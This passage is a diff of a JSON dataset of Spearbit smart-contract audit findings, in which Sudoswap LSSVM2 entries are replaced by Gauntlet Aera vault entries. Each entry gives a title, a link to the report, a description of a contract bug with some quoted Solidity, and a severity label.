With dual home tokens (see weird-erc20), the emit could be skipped when the \"other\" token is transferred. Also, the isPair() check in depositNFTs() does not specifically check if the pair variant is ERC721_ERC20 or ERC721_ETH. This allows accidentally misdirected deposits to invalid pair variants or non-pair recipients leading to loss/lock of NFTs/tokens.", + "title": "Separation of concerns Owner and Manager", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "The Owner and Manager roles are separated on purpose. Role separation usually helps to improve quality. However this separation can be broken if the Owner calls setManager(). This way the Owner can set the Manager to one of his own addresses, do Manager functions (for example setSwapFee()) and perhaps set it back to the Manager. Note: as everything happens on chain these actions can be tracked. function setManager(address newManager) external override onlyOwner { if (newManager == address(0)) { revert Aera__ManagerIsZeroAddress(); } if (initialized && noticeTimeoutAt == 0) { calculateAndDistributeManagerFees(); } emit ManagerChanged(manager, newManager); manager = newManager; }", "labels": [ "Spearbit", - "SudoswapLSSVM2", - "Severity: Medium Risk" + "Gauntlet", + "Severity: Informational" ] }, { - "title": "authAllowedForToken() returns prematurely in certain scenarios causing an authentication DoS", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "Tokens listed on Nifty or Foundation (therefore returning a valid niftyRegistry or foundationTrea- sury) where the proposedAuthAddress is not a valid Nifty sender or a valid Foundation Treasury admin will cause an authentication DoS if the token were also listed on Digitalax or ArtBlocks and the proposedAuthAddress had admin roles on those platforms. This happens because the return values of valid and isAdmin for isValidNiftySender(proposedAuthAddress) and isAdmin(proposedAuthAddress) respectively are returned as-is instead of returning only if/when they are true but continuing the checks for authorization otherwise (if/when they are false) on Digitalax and ArtBlocks. toggleSettingsForCollection and reclaimPair (which utilize authAllowedForToken) would incorrectly fail for valid proposedAuthAddress in such scenarios. 21 return", + "title": "Add modifier whenInitialized to function finalize()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "The function finalize() does not have the modifier whenInitialized while most other functions have this modifier. This does not create any real issues because the function contains the check noticeTimeoutAt == 0 which can only be skipped after initiateFinalization(), and this function does have the whenInitialized modifier. function finalize() external override nonReentrant onlyOwner { // no modifier whenInitialized if (noticeTimeoutAt == 0) { // can only be set via initiateFinalization() revert Aera__FinalizationNotInitialized(); } ... }", "labels": [ "Spearbit", - "SudoswapLSSVM2", - "Severity: Medium Risk" + "Gauntlet", + "Severity: Informational" ] }, { - "title": "Partial fills don't recycle ETH", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "After several fixes are applied, the following code exists. If the sell can be filled completely then ETH is recycled, however when a partial fill is applied then ETH is not recycled. This might lead to a revert and would require doing the trade again. This costs extra gas and the trading conditions might be worse then. function swap(Order calldata swapOrder) external payable returns (uint256[] memory results) { ... // Go through each sell order ... if (pairSpotPrice == order.expectedSpotPrice) { // If the pair is an ETH pair and we opt into recycling ETH, add the output to our total accrued if (order.isETHSell && swapOrder.recycleETH) { ... ... order.pair.swapNFTsForToken(... , payable(address(this)), ... ); } // Otherwise, all tokens or ETH received from the sale go to the token recipient else { ... order.pair.swapNFTsForToken(..., swapOrder.tokenRecipient, ... ); } } // Otherwise we need to do some partial fill calculations first else { ... ... order.pair.swapNFTsForToken(..., swapOrder.tokenRecipient, ... ); // ETH not recycled } // Go through each buy order ... }", + "title": "Document the use of mustAllowlistLPs", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "In the Mannon Vault it is important that no other accounts can use joinPool() on the balancer pool. If other accounts are able to call joinPool(), they would get Balancer Pool Tokens (BPT) which could rise in value once more funds are added to the pool. Luckily this is prevented by the mustAllowlistLPs parameter in NewPoolParams. Readers could easily overlook this parameter. pool = IBManagedPool( IBManagedPoolFactory(factory).create( IBManagedPoolFactory.NewPoolParams({ vault: IBVault(address(0)), name: name, symbol: symbol, tokens: tokens, normalizedWeights: weights, assetManagers: managers, swapFeePercentage: swapFeePercentage, pauseWindowDuration: 0, bufferPeriodDuration: 0, owner: address(this), swapEnabledOnStart: false, mustAllowlistLPs: true, managementSwapFeePercentage: 0 // prevent other account to use joinPool }) ) );", "labels": [ "Spearbit", - "SudoswapLSSVM2", - "Severity: Low Risk" + "Gauntlet", + "Severity: Informational" ] }, { - "title": "Wrong allowances can be abused by the owner", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "The function call() allows transferring tokens and NFTs that have an allowance set to the pair. Normally, allowances should be given to the router, but they could be accidentally given to the pair. Although call() is protected by onlyOwner, the pair is created permissionless and so the owner could be anyone.", + "title": "finalize can be called multiple times", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "The finalize function can be called multiple time, leading to the possibility to waste gas for no reason and emitting again a conceptually wrong Finalized event. Currently, theres no check that will prevent to call the function multiple time and there is no explicit flag to allow external sources (web app, external contract) to know whether the AeraVault has been finalized or not. Scenario: the AeraVault has already been finalized but the owner (that could be a contract and not a single EOA) is not aware of it. He calls finalize again and wastes gas because of the external calls in a loop done in returnFunds and emit an additional event Finalized(owner(), [0, 0, ..., 0]) with an array of zeros in the amounts event parameter.", "labels": [ "Spearbit", - "SudoswapLSSVM2", - "Severity: Low Risk" + "Gauntlet", + "Severity: Informational" ] }, { - "title": "Malicious router mitigation may break for deflationary tokens", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "ERC20 _pullTokenInputAndPayProtocolFee() for routers has a mitigation for malicious routers by checking if the before-after token balance difference is equal to the transferred amount. This will break for any ERC20 pairs with fee-on-transfer deflationary tokens (see weird-erc20). Note that there has been a real-world exploit related to this with Balancer pool and STA deflationary tokens.", + "title": "Consider updating finalize to have a more \"clean\" final state for the AeraVault/Balancer pool", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "This is just a suggestion and not an issue per se. The finalize function should ensure that the pool is in a finalized state for both a better UX and DX. Currently, the finalize function is only withdrawing all the funds from the pool after a noticePeriod but is not ensuring that the swap have been disabled and that all the rewards, entitled to the Vault (owned by the Treasury), have been claimed.", "labels": [ "Spearbit", - "SudoswapLSSVM2", - "Severity: Low Risk" + "Gauntlet", + "Severity: Informational" ] }, { - "title": "Inconsistent royalty threshold checks allow some royalties to be equal to sale amount", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "Threshold checks on royalty amounts are implemented both in _getRoyaltyAndSpec() and its caller _calculateRoyalties(). While _calculateRoyalties() implements an inclusive check with require(saleAmount >= royaltyTotal, \"Royalty exceeds sale price\");, (allowing royalty to be equal to sale amount) the different checks in _getRoyaltyAndSpec() on the returned amounts or in the calculations on bps in _computeAmounts() exclude the saleAmount forcing royalty to be less than the saleAmount. However, only Known Origin and SuperRare are missing a similar threshold check in _getRoyaltyAndSpec(). This allows only the Known Origin and SuperRare royalties to be equal to the sale amount as enforced by the check in _calculateRoyalties().", + "title": "enableTradingWithWeights is not emitting an event for pools weight change", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "enableTradingWithWeights is both changing the pools weight and enabling the swap feature, but its only emitting the swap related event (done by calling setSwapEnabled). Both of those operations should be correctly tracked via events to be monitored by external tools.", "labels": [ "Spearbit", - "SudoswapLSSVM2", - "Severity: Low Risk" + "Gauntlet", + "Severity: Informational" ] }, { - "title": "Numerical difference between getNFTQuoteForBuyOrderWithPartialFill() and _findMaxFill- ableAmtForBuy() may lead to precision errors", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "There is a slight numerical instability between the partial fill calculation and the first client side cal- culation (i.e. getNFTQuoteForSellOrderWithPartialFill() / getNFTQuoteForBuyOrderWithPartialFill(), _- findMaxFillableAmtForBuy() ). This is because getNFTQuoteForSellOrderWithPartialFill() first assumes a buy of 1 item, updates spotPrice/delta, and then gets the next subsequent quote to buy the next item. Whereas _findMaxFillableAmtForBuy() assumes buying multiple items at one time. This can for e.g. Exponential- Curve.sol and XykCurve.sol lead to minor numerical precision errors. function getNFTQuoteForBuyOrderWithPartialFill(LSSVMPair pair, uint256 numNFTs) external view returns ,! (uint256[] memory) { ... for (uint256 i; i < numNFTs; i++) { ... (, spotPrice, delta, price,,) = pair.bondingCurve().getBuyInfo(spotPrice, delta, 1, fee, ...); ... } } function getNFTQuoteForSellOrderWithPartialFill(LSSVMPair pair, uint256 numNFTs) external view returns ,! (uint256[] memory) { ... for (uint256 i; i < numNFTs; i++) { ... (, spotPrice, delta, price,,) = pair.bondingCurve().getSellInfo(spotPrice, delta, 1, fee, ... ); ... } ... } function _findMaxFillableAmtForBuy(LSSVMPair pair, uint256 maxNumNFTs, uint256[] memory ,! maxCostPerNumNFTs, uint256 ... while (start <= end) { ... (...) = pair.bondingCurve().getBuyInfo(spotPrice, delta, (start + end)/2, feeMultiplier, ,! protocolFeeMultiplier); ... } }", + "title": "Document Balancer checks", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "Balancer has a large number of internal checks. Weve discussed the use of additional checks in the Aera Vault functions. The advantage of this is that it could result in more user friendly error messages. Additionally it protects against potential future change in the Balancer code. contract AeraVaultV1 is IAeraVaultV1, Ownable, ReentrancyGuard { function enableTradingWithWeights(uint256[] calldata weights) ... { { ... // doesn't check weights.length pool.updateWeightsGradually(timestamp, timestamp, weights); ... } } Balancer code: function updateWeightsGradually( ..., uint256[] memory endWeights) ... { (IERC20[] memory tokens, , ) = getVault().getPoolTokens(getPoolId()); ... InputHelpers.ensureInputLengthMatch(tokens.length, endWeights.length); // length check is here ... }", "labels": [ "Spearbit", - "SudoswapLSSVM2", - "Severity: Low Risk" + "Gauntlet", + "Severity: Informational" ] }, { - "title": "Differences with Manifold version of RoyaltyEngine may cause unexpected behavior", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "Sudoswap has forked RoyaltyEngine from Manifold; however there are some differences. The Manifold version of _getRoyaltyAndSpec() also queries getRecipients(), while the Sudoswap version doesn't. This means the Sudoswap will not spread the royalties over all recipients. function _getRoyaltyAndSpec(...) // Manifold ,! ,! ... try IEIP2981(royaltyAddress).royaltyInfo(tokenId, value) returns (address recipient, uint256 amount) { ... try IRoyaltySplitter(royaltyAddress).getRecipients() returns (Recipient[] memory splitRecipients) { ... } } } function _getRoyaltyAndSpec(...) // Sudoswap ... try IEIP2981(royaltyAddress).royaltyInfo(tokenId, value) returns (address recipient, uint256 ,! amount) { ... } ... } } The Manifold version of getRoyalty() has an extra try/catch compared to the Sudoswap version. This protects against reverts in the cached functions. Note: adding an extra try/catch requires the function _getRoyaltyAnd- Spec() to be external. function getRoyalty(address tokenAddress, uint256 tokenId, uint256 value) ... { // Manifold ... try this._getRoyaltyAndSpec{gas: 100000}(tokenAddress, tokenId, value) returns ( ... ) .... } function getRoyalty(address tokenAddress, uint256 tokenId, uint256 value) ... { // Sudoswap ... ... (...) = _getRoyaltyAndSpec(tokenAddress, tokenId, value); }", + "title": "Rename FinalizationInitialized to FinalizationInitiated for code consistency", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "The function at L517 was renamed from initializeFinalization to initiateFinalization to avoid confusion with the Aera vault initialization. For code consistency, the corresponding event and error names should be changed.", "labels": [ "Spearbit", - "SudoswapLSSVM2", - "Severity: Low Risk" + "Gauntlet", + "Severity: Informational" ] }, { - "title": "Swaps with property-checked ERC1155 sell orders in VeryFastRouter will fail", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "Any swap batch of transactions which has a property-checked sell order for ERC1155 will revert. Given that property checks are not supported on ERC1155 pairs (but only ERC721), swap sell orders for ERC1155 in VeryFastRouter will fail if order.doPropertyCheck is accidentally set because the logic thereafter assumes it is an ERC721 order.", + "title": "Consider enforcing an explicit check on token order to avoid human error", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "The Balancer protocol require (and enforce during the pool creation) that the pools token must be ordered by the token address. The following functions accept an uint256[] of amounts or weights without knowing if the order inside that array follow the same order of the tokens inside the Balancer pool. initialDeposit deposit withdraw enableTradingWithWeights updateWeightsGradually While its impossible to totally prevent the human error (they could specify the correct token order but wrongly swap the input order of the amount/weight) we could force the user to be more aware of the specific order in which the amounts/weights must be specified. A possible solution applied to the initialDeposit as an example could be: 37 function initialDeposit(IERC20[] calldata tokensSorted, uint256[] calldata amounts) external override onlyOwner { // ... other code IERC20[] memory tokens = getTokens(); // check that also the tokensSorted length match the lenght of other arrays if (tokens.length != amounts.length || tokens.length != tokensSorted.length) { revert Aera__AmountLengthIsNotSame( tokens.length, amounts.length ); } // ... other code for (uint256 i = 0; i < tokens.length; i++) { // check that the token position associated to the amount has the same position of the one in ,! the balancer pool if( address(tokens[i]) != address(tokensSorted[i]) ) { revert Aera__TokenOrderIsNotSame( address(tokens[i]), address(tokensSorted[i]), i ); } depositToken(tokens[i], amounts[i]); } // ... other code } Another possible implementation would be to introduce a custom struct struct TokenAmount { IERC20 token; uint256 value; } Update the function signature function initialDeposit(TokenAmount[] calldata tokenWithAmount) and up- date the example code following the new parameter model. Its important to note that while this solution will not completely prevent the human error, it will increase the gas consumption of each function.", "labels": [ "Spearbit", - "SudoswapLSSVM2", - "Severity: Low Risk" + "Gauntlet", + "Severity: Informational" ] }, { - "title": "changeSpotPriceAndDelta() reverts when there is enough liquidity to support 1 sell", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "changeSpotPriceAndDelta() reverts when there is enough liquidity to support 1 sell because it uses > instead of >= in the check pairBalance > newPriceToSellToPair.", + "title": "Swap is not enabled after initialDeposit execution", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "In the current deployment flow of the AeraVault the Balancer pool is created (by the constructor) with swapEnabledOnStart set as false. When the pool receives their initial funds via initialDeposit the pool has still the swap functionality disabled. It is not explicitly clear in the specification document and in the code when the swap functionality should be enabled. If the protocol wants to enable the swap as soon as the funds are deposited in the pool, they should call, after bVault.joinPool(...), setSwapEnabled(true) or enableTradingWithWeights(uint256[] calldata weights) in case the external spot price is not aligned (both functions will also trigger a SetSwapEnabled event)", "labels": [ "Spearbit", - "SudoswapLSSVM2", - "Severity: Low Risk" + "Gauntlet", + "Severity: Informational" ] }, - { - "title": "Lack of support for per-token royalties may lead to incorrect royalty payments", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "The protocol currently lacks complete support for per-token royalties, assumes that all NFTs in a pair have the same royalty and so considers the first assetId to determine royalties for all NFT token Ids in the pair. If not, the pair owner is expected to make a new pair for NFTs that have different royalties. A pair with NFTs that have different royalties will lead to incorrect royalty payments for the different NFTs.", + { + "title": "Remove commented code and replace input values with Balancer enum", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "Inside initialDeposit function, there is some commented code (used as example) that should be removed for clarity and future confusion. The initUserData should not use direct input values (0 in this case) but use the correct Balancers enum value to avoid any possible confusion. Following the Balancer documentation Encoding userData JoinKind The correct way to declare initUserData is using the WeightedPoolUserData.JoinKind.INIT enum value.", "labels": [ "Spearbit", - "SudoswapLSSVM2", - "Severity: Low Risk" + "Gauntlet", + "Severity: Informational" ] }, { - "title": "Missing additional safety for multicall may lead to lost ETH in future", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "If the function multicall() would be payable, then multiple delegated-to functions could use the same msg.value , which could result in losing ETH from the pair. A future upgrade of Solidity might change the default setting for function to payable. See Solidity issue#12539. function multicall(bytes[] calldata calls, bool revertOnFail) external onlyOwner { for (uint256 i; i < calls.length;) { (bool success, bytes memory result) = address(this).delegatecall(calls[i]); ... } }", + "title": "The Created event is not including all the information used to deploy the Balancer pool and are missing indexed properties", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "The current Created event is defined as 39 event Created( address indexed factory, IERC20[] tokens, uint256[] weights, address manager, address validator, uint32 noticePeriod, string description ); And is missing some of the information that are used to deploy the pool. To allow external tools to better monitor the deployment of the pools, it should be better to include all the information that have been used to deploy the pool on Balancer. The following information is currently missing from the event definition: name symbol managementFee swapFeePercentage The event could also define both manager and validator as indexed event parameters to allow external tools to filter those events by those values.", "labels": [ "Spearbit", - "SudoswapLSSVM2", - "Severity: Low Risk" + "Gauntlet", + "Severity: Informational" ] }, { - "title": "Missing zero-address check may allow re-initialization of pairs", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "address(0), \"Initialized\");. However, without a zero-address check on _owner, this can be true even later if the pair is initialized accidentally with address(0) instead of msg.sender. This is because __Ownable_init in OwnableWithTransferCallback does not disallow address(0) unlike transferOwnership. This is however not the case with the current implementation where LSSVMPair.initialize() is called from LSSVMPairFactory with msg.sender as argument for _owner. it Therefore, LSSVMPair.initialize() may be called multiple times.", + "title": "Rename temp variable managers to assetManagers to avoid confusions and any potential future mistakes", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "The managers declared in the linked code (see context) are in reality Asset Manager that have a totally different role compared to the AeraVault Manager role. The AssetManager is able to control the pools balance, withdrawing from it or depositing into it. To avoid confusion and any potential future mistakes, it should be better to rename the temporary variable managers to a more appropriate name like assetManagers. - address[] memory managers = new address[](tokens.length); + address[] memory assetManagers = new address[](tokens.length); for (uint256 i = 0; i < tokens.length; i++) { - + } managers[i] = address(this); assetManagers[i] = address(this); pool = IBManagedPool( IBManagedPoolFactory(factory).create( - + IBManagedPoolFactory.NewPoolParams({ vault: IBVault(address(0)), name: name, symbol: symbol, tokens: tokens, normalizedWeights: weights, assetManagers: managers, assetManagers: assetManagers, swapFeePercentage: swapFeePercentage, pauseWindowDuration: 0, bufferPeriodDuration: 0, owner: address(this), swapEnabledOnStart: false, mustAllowlistLPs: true, managementSwapFeePercentage: 0 }) ) ); 41", "labels": [ "Spearbit", - "SudoswapLSSVM2", - "Severity: Low Risk" + "Gauntlet", + "Severity: Informational" ] }, { - "title": "Trade pair owners are allowed to change asset recipient address when it has no impact", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "Trade pair owners are allowed to change their asset recipient address using changeAssetRecipi- ent() while getAssetRecipient() always returns the pair address itself for Trade pairs as expected. Trade pair owners mistakenly assume that they can change their asset recipient address using changeAssetRe- cipient() because they are allowed to do so successfully, but may be surprised to see that it has no effect. They may expect assets at the new address but that will not be the case.", + "title": "Move description declaration inside the storage slot code block", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "In the current code, the description state variable is in the block of /// STORAGE /// where all the immutable variable are re-grouped. As the dev comment say, string cannot be immutable bytecode but only set in constructor so it would be better to move it inside the /// STORAGE SLOT START /// block of variables that regroup all the non-constant and non-immutable state variables.", "labels": [ "Spearbit", - "SudoswapLSSVM2", - "Severity: Low Risk" + "Gauntlet", + "Severity: Informational" ] }, { - "title": "NFT projects with custom settings and multiple royalty receivers will receive royalty only for first receiver", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "_calculateRoyalties() and its view equivalent only consider the first royalty receiver when custom settings are enabled. If non-ERC-2981 compliant NFT projects on Manifold/ArtBlocks or other platforms that support multiple royalty receivers come up with custom settings that pair owners subscribe to, then all the royalty will go to the first recipient. Other receivers will not receive any royalties.", + "title": "Remove unused imports from code", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "The current implementation of the AeraVaultV1 contract is importing OpenZeppelin IERC165 inter- face, but that interface is never used or references in the code.", "labels": [ "Spearbit", - "SudoswapLSSVM2", - "Severity: Low Risk" + "Gauntlet", + "Severity: Informational" ] }, { - "title": "Missing non-zero checks allow event emission spamming", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "Functions depositNFTs() and depositERC20() are meant to allow deposits into the pair post- creation. However, they do not check if non-zero NFTs or tokens are being deposited. The event emission only checks if the pair recipient is valid. Given their permissionless nature, this allows anyone to grief the system with zero NFT/token deposits causing emission of events which may hinder indexing/monitoring systems.", + "title": "shortfall is repeated twice in IWithdrawalValidator natspec comments", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "The word shortfall is repeated twice in the natspec comment.", "labels": [ "Spearbit", - "SudoswapLSSVM2", - "Severity: Low Risk" + "Gauntlet", + "Severity: Informational" ] }, { - "title": "Missing sanity zero-address checks may lead to undesired behavior or lock of funds", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "Certain logic requires zero-address checks to avoid undesired behavior or lock of funds. For exam- ple, in Splitter.sol#L34 users can permanently lock ETH by mistakenly using safeTransferETH with default/zero- address value.", + "title": "Provide definition of weights & managementFee_ in the NatSpec comment", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "The NatSpec Format is special form of comments to provide rich documentation for functions, return variables and more. We observed an occurrence where the NatSpec comments are missing for two of the user inputs (weights & managementFee_).", "labels": [ "Spearbit", - "SudoswapLSSVM2", - "Severity: Low Risk" + "Gauntlet", + "Severity: Informational" ] }, { - "title": "Legacy NFTs are not compatible with protocol pairs", + "title": "Partial fills for buy orders in ERC1155 swaps will fail when pair has insufficient balance", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "Pairs support ERC721 and ERC1155 NFTs. However, users of NFT marketplaces may also expect to find OG NFTs such as Cryptopunks, Etherrocks or Cryptokitties, which do not adhere to these ERC standards. For example, Cryptopunks have their own internal marketplace which allows users to trade their NFTs with other users. Given that Cryptopunks does not adhere to the ERC721 standard, it will always fail when the protocol attempts to trade them. Even with wrapped versions of these NFTs, people who aren't aware or have the original version won't be able to trade them in a pair.", + "body": "Partial fills are currently supported for buy orders in VeryFastRouter.swap(). When _findMaxFil- lableAmtForBuy() determines numItemsToFill, it is not guaranteed that the underlying pair has so many items left to fill. While ERC721 swap handles the scenario where pair balance is less than numItemsToFill in the logic of _findAvailableIds() (maxIdsNeeded vs numIdsFound), ERC1155 swap is missing a similar check and reduction of item numbers when required. Partial fills for buy orders in ERC1155 swaps will fail when the pair has a balance less than numItemsToFill as determined by _findMaxFillableAmtForBuy(). Partial filling, a key feature of VeryFastRouter, will then not work as expected and would lead to an early revert which defeats the purpose of swap().", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Low Risk" + "Severity: High Risk" ] }, { - "title": "Unnecessary payable specifier for functions may allow ETH to be sent and locked/lost", + "title": "Function token() of cloneERC1155ERC20Pair() reads from wrong location", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "LSSVMPair.initialize() which do not expect to receive and process Ether have the payable specifier which allows interacting users to accidentally send them Ether which will get locked/lost. LSSVMRouter.robustSwapERC20ForSpecificNFTsAndNFTsToToken() Functions", + "body": "The function token() loads the token data from position 81. However on ERC1155 pairs it should load it from position 93. Currently, it doesn't retrieve the right values and the code won't function correctly. LSSVMPair.sol: LSSVMPair.sol: 20))) ,! LSSVMPair.sol: 40))) ,! LSSVMPair.sol: 60))) _factory _bondingCurve := shr(0x60, calldataload(sub(calldatasize(), paramsLength))) := shr(0x60, calldataload(add(sub(calldatasize(), paramsLength), _nft := shr(0x60, calldataload(add(sub(calldatasize(), paramsLength), _poolType := shr(0xf8, calldataload(add(sub(calldatasize(), paramsLength), ,! LSSVMPairERC1155.sol: id LSSVMPairERC721.sol: _propertyChecker := shr(0x60, calldataload(add(sub(calldatasize(), paramsLength), := calldataload(add(sub(calldatasize(), paramsLength), 61)) 61))) ,! LSSVMPairERC20.sol: ,! 81))) _token := shr(0x60, calldataload(add(sub(calldatasize(), paramsLength), function cloneERC1155ERC20Pair(... ) ... { assembly { ... mstore(add(ptr, 0x3e), shl(0x60, factory)) - 20 bytes mstore(add(ptr, 0x52), shl(0x60, bondingCurve)) // position 20 - 20 bytes // position 40 - 20 bytes mstore(add(ptr, 0x66), shl(0x60, nft)) // position 60 - 1 bytes mstore8(add(ptr, 0x7a), poolType) // position 61 - 32 bytes mstore(add(ptr, 0x7b), nftId) mstore(add(ptr, 0x9b), shl(0x60, token)) // position 93 - 20 bytes ... // position 0 } } 6", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Low Risk" + "Severity: High Risk" ] }, { - "title": "Obsolete Splitter contract may lead to locked ETH/tokens", + "title": "Switched order of update leads to incorrect partial fill calculations", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "After a pair has be reclaimed via reclaimPair(), pairInfos[] will be emptied and getPrevFeeRe- cipientForPair() will return 0. The obsolete Splitter will however remain present, but any ETH or tokens that are sent to the contract can't be completely retrieved via withdrawETH() and withdrawTokens(). This is because getPrevFeeRecipientForPair() is 0 and the tokens would be send to address(0). It is unlikely though that ETH or tokens are sent to the Splitter contract as it is not used anymore. function withdrawETH(uint256 ethAmount) public { ISettings parentSettings = ISettings(getParentSettings()); ... payable(parentSettings.getPrevFeeRecipientForPair(getPairAddressForSplitter())).safeTransferETH(... ); ,! } function withdrawTokens(ERC20 token, uint256 tokenAmount) public { ISettings parentSettings = ISettings(getParentSettings()); ... token.safeTransfer(parentSettings.getPrevFeeRecipientForPair(getPairAddressForSplitter()), ... ); c } function getPrevFeeRecipientForPair(address pairAddress) public view returns (address) { return pairInfos[pairAddress].prevFeeRecipient; } function reclaimPair(address pairAddress) public { ... delete pairInfos[pairAddress]; ... }", + "body": "In the binary search, the order of updation of start and numItemsToFill is switched with start being updated before numItemsToFill which itself uses the value of start: start = (start + end)/2 + 1; numItemsToFill = (start + end)/2; This leads to incorrect partial fill calculations when binary search recurses on the right half.", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Low Risk" + "Severity: High Risk" ] }, { - "title": "Divisions in getBuyInfo() and getSellInfo() may be rounded down to 0", + "title": "Swap functions with sell orders in LSSVMRouter will fail for property-check enforced pairs", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "In extreme cases (e.g. tokens with a few decimals, see this example), divisions in getBuyInfo() and getSellInfo() may be rounded down to 0. This means inputValueWithoutFee and/or outputValueWithoutFee may be 0. function getBuyInfo(..., uint256 numItems, ... ) ... { ... uint256 inputValueWithoutFee = (numItems * tokenBalance) / (nftBalance - numItems); ... } function getSellInfo(..., uint256 numItems, ... ) ... { ... uint256 outputValueWithoutFee = (numItems * tokenBalance) / (nftBalance + numItems); ... }", + "body": "Swap functions with sell orders in LSSVMRouter will revert for property-check enforced pairs. While VeryFastRouter swap function supports sell orders to specify property check parameters for pairs enforcing them, none of the swap functions in LSSVMRouter support the same.", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Low Risk" + "Severity: High Risk" ] }, { - "title": "Last NFT in an XykCurve cannot be sold", + "title": "pairTransferERC20From() only supports ERC721 NFTs", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "The function getBuyInfo() of XykCurve enforces numItems < nftBalance, which means the last NFT can never be sold. One potential solution as suggested by the Sudoswap team is to set delta (=nftBalance) one higher than the real amount of NFTs. This could cause problems in other parts of the code. For example, once only one NFT is left, if we try to use changeSpotPriceAndDelta(), getBuyNFTQuote(1) will error and thus the prices (tokenBalance) and delta (nftBalance) can't be changed anymore. If nftBalance is set to one higher, then it won't satisfy pair.nft().balanceOf(pairAddress) >= 1. 31 contract XykCurve ... { function getBuyInfo(..., uint256 numItems, ... ) ... { ... uint256 tokenBalance = spotPrice; uint256 nftBalance = delta; ... // If numItems is too large, we will get divide by zero error if (numItems >= nftBalance) { return (Error.INVALID_NUMITEMS, 0, 0, 0, 0, 0); } ... } } function changeSpotPriceAndDelta(...) ... { ... (,,, uint256 priceToBuyFromPair,) = pair.getBuyNFTQuote(1); ... if (... && pair.nft().balanceOf(pairAddress) >= 1) { pair.changeSpotPrice(newSpotPrice); pair.changeDelta(newDelta); return; } ... } function getBuyNFTQuote(uint256 numNFTs) ... { (error, ...) = bondingCurve().getBuyInfo(..., numNFTs, ...); }", + "body": "Function pairTransferERC20From() which is is present in both LSSVMRouter and VeryFastRouter, only checks for ERC721_ERC20. This means ERC1155 NFTs are not 